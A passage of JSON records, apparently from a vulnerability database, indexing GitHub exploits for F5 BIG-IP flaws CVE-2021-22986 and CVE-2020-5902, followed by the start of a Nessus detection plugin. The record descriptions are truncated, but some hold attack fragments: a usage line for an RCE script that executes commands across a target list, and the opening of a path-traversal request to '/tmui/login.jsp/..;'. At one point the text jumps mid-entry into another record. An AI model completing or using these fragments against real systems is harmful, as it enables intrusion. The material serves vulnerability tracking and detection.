"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T07:13:50", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-21T02:11:00", "id": "B96958C0-96FF-52FF-A4B1-CE6F774F0C6F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:28:22", "description": "# CVE-2021-22986\n\nThis is a simple script to ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T13:01:08", "type": "githubexploit", "title": "Exploit for Vulnerability in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 
10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-03-29T13:04:49", "id": "67F9A7F6-596E-5695-BCBF-B11FE476AD9E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:40:57", "description": "# F5 BIG-IP remote command execution vulnerability (CVE-2021-22986)\n\n## Vulnerability impact\n\nF5 BIG-IP 16.x: 1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T03:32:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-07-05T07:21:07", "id": "BF090D08-5787-5245-85E4-88DA87E8EC1D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:41:02", "description": "# CVE-2021-22986\nF5 BIG-IP/BIG-IQ 
iControl Rest...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T04:58:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-11-03T13:24:11", "id": "08530E98-10F4-5651-8118-F76E99D5856F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:08:47", "description": "# CVE-2021-22986_Check\nCVE-2021-22986 Checker Script in Python3\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T02:04:39", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip 
Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-05-21T00:55:58", "id": "48FD5EC4-10B3-5CB3-96C6-4D70E2A52EEF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:30:29", "description": "# CVE-2021-22986-Poc\nThis is a Poc for BIGIP iControl unauth RCE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T05:02:45", "type": "githubexploit", "title": "Exploit for Vulnerability in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-22986"], "modified": "2021-12-15T14:41:40", "id": "F6F649DA-905A-5158-B6BD-5A1F1F740C68", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-13T09:03:21", "description": "# Usage\r\n\r\n```\r\npython3 f5_rce.py \r\n\r\n-u specify the target URL\r\n-f file of targets for batch checking\r\n-c execute comm...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-21T07:40:51", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-13T08:25:58", "id": "91A5A7DD-3544-5856-890C-F8D738DAC6F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:13:41", "description": "# Usage\r\n\r\n```\r\npython3 f5_rce.py \r\n\r\n-u specify the target URL\r\n-f file of targets for batch checking\r\n-c execute comm...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-19T18:50:22", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2022-08-15T15:41:27", "id": "4E7397B3-57E1-5961-BE00-E340DD46B130", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:11:57", "description": "**F5 BIG-IP RCE / CVE-2021-22986\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e**\n\n**Code By:T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T05:56:21", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T01:12:23", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-27T07:12:03", "id": "2D3AD059-4772-527B-A78C-724AFA1B109F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:02:50", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T11:42:34", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T12:00:28", "id": "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-04T08:17:02", "description": "F5 BIG-IP RCE\uff08CVE-2020-5902\uff09\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\n==\n\n\n# Summary\n\n20200706\uff0c\u7f51\u4e0a\u66dd\u51fa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-10T15:33:00", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-08-04T02:59:22", "id": "431446A1-D76F-5889-BBDD-1C55456A4D73", "href": "", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-07T02:06:21", "description": "# CVE-2020-5902-POC-EXP\n\n**\u4f7f\u7528\u65b9\u6cd5**\n\n python3 f5_rce.py scan ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T09:16:36", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-08-05T10:04:54", "id": "D4572C36-FAE8-5802-9B48-CF143220B909", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:31", "description": "# Cve-2020-5029-finder\nIt is a small script to fetch out the s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T10:38:35", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5029", "CVE-2020-5902"], "modified": "2020-07-13T08:20:12", "id": "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:49:11", "description": "# CVE-2020-5902\n## RCE\n/tmui/login.jsp/..;/tmui/locallb/workspac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-25T02:07:41", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-10-25T06:02:24", "id": "F22160B4-2E80-5B7D-8238-95D7833F6D73", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:55:02", "description": "# CVE-2020-6308-mass-explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-30T03:08:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Sap Businessobjects Business Intelligence Platform", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2020-6308"], "modified": "2021-02-08T13:43:16", "id": "350E6199-FA83-5A2F-91D3-19E2D2921801", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2022-06-16T14:55:40", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 
15.1.2.1 / 16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K03009991 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : iControl REST unauthenticated remote command execution vulnerability (K03009991)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL03009991.NASL", "href": "https://www.tenable.com/plugins/nessus/147626", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K03009991.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147626);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2021-22986\");\n 
script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"F5 Networks BIG-IP : iControl REST unauthenticated remote command execution vulnerability (K03009991)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 /\n16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K03009991 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the\n iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software\n versions which have reached End of Software Development (EoSD) are not evaluated. 
(CVE-2021-22986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K03009991\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K03009991.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22986\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 iControl REST Unauthenticated SSRF Token Generation RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n 